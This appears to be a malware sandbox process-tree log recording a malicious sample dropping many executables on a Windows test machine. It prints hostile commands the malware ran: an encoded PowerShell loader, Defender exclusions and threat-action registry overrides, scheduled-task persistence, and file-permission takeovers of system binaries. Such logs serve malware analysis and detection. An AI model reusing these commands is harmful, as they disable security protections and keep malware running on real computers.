C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9032
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵PID:4544
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:6292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OnVT4nRnqpI9.bat" "23⤵PID:8608
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:3948
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7024
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"24⤵PID:8736
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:5644
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LLiRiWqd1keR.bat" "25⤵PID:8368
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:1772
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5144
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"26⤵PID:9192
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:4072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HJP9IhqcWbcw.bat" "27⤵PID:8864
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:8440
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3760
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"28⤵PID:4556
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:4124
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6sn6DjLrG5Bc.bat" "29⤵PID:8344
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:8984
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\the.exethe.exe3⤵
- Executes dropped EXE
PID:6732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA4⤵
- UAC bypass
- Windows security bypass
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\the.exe" -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7468
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"5⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7512 -
C:\Users\Admin\Pictures\lx26s09UlZjAOugX3CvKdnQ3.exe"C:\Users\Admin\Pictures\lx26s09UlZjAOugX3CvKdnQ3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7736
-
-
C:\Users\Admin\Pictures\SWjzRG7RCalw924ufm5qL0sx.exe"C:\Users\Admin\Pictures\SWjzRG7RCalw924ufm5qL0sx.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
PID:1592 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 3567⤵
- Program crash
PID:7408
-
-
-
C:\Users\Admin\Pictures\6eoK9cmGaTaMPDXJDZ5cDxGS.exe"C:\Users\Admin\Pictures\6eoK9cmGaTaMPDXJDZ5cDxGS.exe"6⤵
- Modifies firewall policy service
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:5776 -
C:\Users\Admin\Documents\piratemamm\Z8t0pFkWK3m0W0pQLRHCqeUL.exeC:\Users\Admin\Documents\piratemamm\Z8t0pFkWK3m0W0pQLRHCqeUL.exe7⤵PID:8592
-
-
C:\Users\Admin\Documents\piratemamm\aTJUAtpVMdPytuyR0HOsCgxw.exeC:\Users\Admin\Documents\piratemamm\aTJUAtpVMdPytuyR0HOsCgxw.exe7⤵PID:4356
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:4580
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:7044
-
-
-
C:\Users\Admin\Documents\piratemamm\sPQ2SE4hD4JNv4dSwj_Q1RB7.exeC:\Users\Admin\Documents\piratemamm\sPQ2SE4hD4JNv4dSwj_Q1RB7.exe7⤵PID:8544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\piratemamm\sPQ2SE4hD4JNv4dSwj_Q1RB7.exe" -Force8⤵
- Command and Scripting Interpreter: PowerShell
PID:4572
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"8⤵PID:8944
-
C:\Users\Admin\Pictures\AVnq8vZCzLldUHR6uTZF79zz.exe"C:\Users\Admin\Pictures\AVnq8vZCzLldUHR6uTZF79zz.exe"9⤵PID:8512
-
-
C:\Users\Admin\Pictures\XJJY0YDC8CW13ScDrJpziNaD.exe"C:\Users\Admin\Pictures\XJJY0YDC8CW13ScDrJpziNaD.exe"9⤵PID:6528
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"8⤵PID:6160
-
-
-
C:\Users\Admin\Documents\piratemamm\6Zqf_ldBmq3rzJmo7C9SMvep.exeC:\Users\Admin\Documents\piratemamm\6Zqf_ldBmq3rzJmo7C9SMvep.exe /S /did=5254037⤵PID:7440
-
C:\Users\Admin\AppData\Local\Temp\7zSD10D.tmp\Install.exe.\Install.exe /S /did=5254038⤵PID:8484
-
C:\Users\Admin\AppData\Local\Temp\7zSE233.tmp\Install.exe.\Install.exe /hnmdidSGLmk "525403" /S /S /did=5254039⤵PID:4580
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"10⤵PID:6488
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
PID:8276 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 612⤵PID:9088
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 613⤵PID:1724
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"11⤵
- Indirect Command Execution
PID:1724 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 612⤵PID:7284
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 613⤵PID:5408
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"10⤵
- Indirect Command Execution
PID:5280 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵PID:7384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True12⤵
- Command and Scripting Interpreter: PowerShell
PID:7052 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True13⤵PID:6100
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bUrgtLorVQntIbrvYS" /SC once /ST 19:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSE233.tmp\Install.exe\" Xi /DZldidho 525403 /S" /V1 /F10⤵
- Scheduled Task/Job: Scheduled Task
PID:6768
-
-
-
-
-
C:\Users\Admin\Documents\piratemamm\_6Mbe7dpbVGcKvisAiF33Bfg.exeC:\Users\Admin\Documents\piratemamm\_6Mbe7dpbVGcKvisAiF33Bfg.exe7⤵PID:6708
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:7736
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵PID:1436
-
-
-
C:\Users\Admin\Documents\piratemamm\wmC8_s0x6QGMWkUdOlIa8fbV.exeC:\Users\Admin\Documents\piratemamm\wmC8_s0x6QGMWkUdOlIa8fbV.exe7⤵PID:7540
-
-
C:\Users\Admin\Documents\piratemamm\dCK4hwsjPgIbAA4O7SJS7Ok0.exeC:\Users\Admin\Documents\piratemamm\dCK4hwsjPgIbAA4O7SJS7Ok0.exe7⤵PID:8256
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:8696
-
-
-
C:\Users\Admin\Documents\piratemamm\oZCpWkx39j9GnHQMOl8Kmxam.exeC:\Users\Admin\Documents\piratemamm\oZCpWkx39j9GnHQMOl8Kmxam.exe7⤵PID:8404
-
C:\Users\Admin\AppData\Local\Temp\is-18UQB.tmp\oZCpWkx39j9GnHQMOl8Kmxam.tmp"C:\Users\Admin\AppData\Local\Temp\is-18UQB.tmp\oZCpWkx39j9GnHQMOl8Kmxam.tmp" /SL5="$2053E,4025586,54272,C:\Users\Admin\Documents\piratemamm\oZCpWkx39j9GnHQMOl8Kmxam.exe"8⤵PID:2344
-
C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe"C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe" -i9⤵PID:6488
-
-
C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe"C:\Users\Admin\AppData\Local\SuffixEx\suffixex32_64.exe" -s9⤵PID:5780
-
-
-
-
C:\Users\Admin\Documents\piratemamm\cA2dIpkwaaaEIaYm8k_ioETs.exeC:\Users\Admin\Documents\piratemamm\cA2dIpkwaaaEIaYm8k_ioETs.exe7⤵PID:9036
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵PID:6504
-
-
-
C:\Users\Admin\Documents\piratemamm\Eh0ooWT0NCzz8_zB5pggpidA.exeC:\Users\Admin\Documents\piratemamm\Eh0ooWT0NCzz8_zB5pggpidA.exe7⤵PID:7484
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"8⤵PID:7608
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"9⤵PID:4448
-
-
C:\Users\Admin\AppData\Local\Temp\1000020001\2671d90175.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\2671d90175.exe"9⤵PID:692
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4EE.tmp\4EF.tmp\4F0.bat C:\Users\Admin\AppData\Local\Temp\1000020001\2671d90175.exe"10⤵PID:2664
-
-
-
C:\Users\Admin\1000021002\2b6c130756.exe"C:\Users\Admin\1000021002\2b6c130756.exe"9⤵PID:7496
-
-
-
-
C:\Users\Admin\Documents\piratemamm\ay85_ULmv5PUz0wHhxMnCWJ9.exeC:\Users\Admin\Documents\piratemamm\ay85_ULmv5PUz0wHhxMnCWJ9.exe7⤵PID:1656
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
PID:6580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
PID:5672
-
-
-
C:\Users\Admin\Documents\piratemamm\rLSBhs5J_p58rPUv05JbI0OF.exeC:\Users\Admin\Documents\piratemamm\rLSBhs5J_p58rPUv05JbI0OF.exe7⤵PID:1508
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Belly Belly.cmd & Belly.cmd & exit8⤵PID:7464
-
-
-
C:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exeC:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exe7⤵PID:7432
-
C:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exeC:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exe8⤵PID:8664
-
C:\Users\Admin\AppData\Local\Temp\calculator.exeC:\Users\Admin\AppData\Local\Temp\calculator.exe9⤵PID:8236
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Florence Florence.cmd & Florence.cmd & exit10⤵PID:4400
-
-
-
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"5⤵PID:7544
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6756
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6820 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_ab0ad3c8-8e5f-4ef7-ae0b-29dfec539936\caller.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:6872
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\ac3.exeac3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:6196
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\shell1.ps1"3⤵PID:6316
-
-
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6352
-
-
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6412
-
-
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6200
-
-
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:7128
-
-
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:8032
-
-
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:7488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6628
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6244
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7384
-
-
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:7448
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7612
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7460
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\freebobux.exefreebobux.exe3⤵PID:6244
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9FEF.tmp\freebobux.bat""4⤵PID:5340
-
C:\Users\Admin\AppData\Local\Temp\9FEF.tmp\CLWCP.execlwcp c:\temp\bg.bmp5⤵PID:6664
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9FEF.tmp\x.vbs"5⤵PID:8952
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\SolaraBootstraper.exeSolaraBootstraper.exe3⤵PID:7380
-
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵PID:7452
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵PID:5388
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:6488
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"5⤵
- Views/modifies file attributes
PID:5284
-
-
